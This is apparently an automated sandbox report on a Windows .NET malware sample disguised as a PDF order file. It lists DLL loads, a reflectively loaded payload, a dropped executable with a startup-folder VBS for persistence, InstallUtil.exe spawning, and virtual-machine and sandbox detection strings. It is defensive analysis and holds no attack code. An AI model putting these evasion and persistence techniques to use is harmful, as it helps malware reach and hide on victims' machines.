                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: thumbcache.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptnet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: Order88983273293729387293828PDF.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Order88983273293729387293828PDF.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                    Source: Order88983273293729387293828PDF.exe Static file information: File size 1484288 > 1048576
                    Source: Order88983273293729387293828PDF.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x169c00
                    Source: Order88983273293729387293828PDF.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.00000000037E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.00000000037E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: Order88983273293729387293828PDF.exe, -.cs .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, ListDecorator.cs .Net Code: Read
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                    Source: 0.2.Order88983273293729387293828PDF.exe.41b4a90.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, ListDecorator.cs .Net Code: Read
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                    Source: 0.2.Order88983273293729387293828PDF.exe.6950000.11.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                    Source: 0.2.Order88983273293729387293828PDF.exe.38d0890.6.raw.unpack, -.cs .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: Yara match File source: 3.2.MaxGeneration.exe.4c82c50.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Order88983273293729387293828PDF.exe.6aa0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.1722029295.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1884455692.0000000004C3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1739089307.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_078C2310 push es; ret 1_2_078C231C
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe File created: C:\Users\user\AppData\Roaming\MaxGeneration.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                    Boot Survival

                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Memory allocated: DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Memory allocated: 27C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Memory allocated: 47C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Memory allocated: 72F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Memory allocated: 82F0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2680000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2890000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 26B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Memory allocated: 3230000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Memory allocated: 3430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Memory allocated: 5430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Memory allocated: 7F20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Memory allocated: 8F20000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1600000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3130000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3030000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Window / User API: threadDelayed 1324
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Window / User API: threadDelayed 4721
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 706Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeWindow / User API: threadDelayed 1958Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeWindow / User API: threadDelayed 2812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: MaxGeneration.exe, 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 00000001.00000002.2935903636.0000000005147000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2951305620.0000000006E18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: MaxGeneration.exe, 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                    Source: wscript.exe, 00000002.00000002.1814746517.0000024BE2FA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef000
                    Source: InstallUtil.exe, 00000001.00000002.2935903636.0000000005147000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1735284737.0000000005460000.00000004.00000020.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1910445057.00000000061C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\MaxGeneration.exe "C:\Users\user\AppData\Roaming\MaxGeneration.exe"
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Queries volume information: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
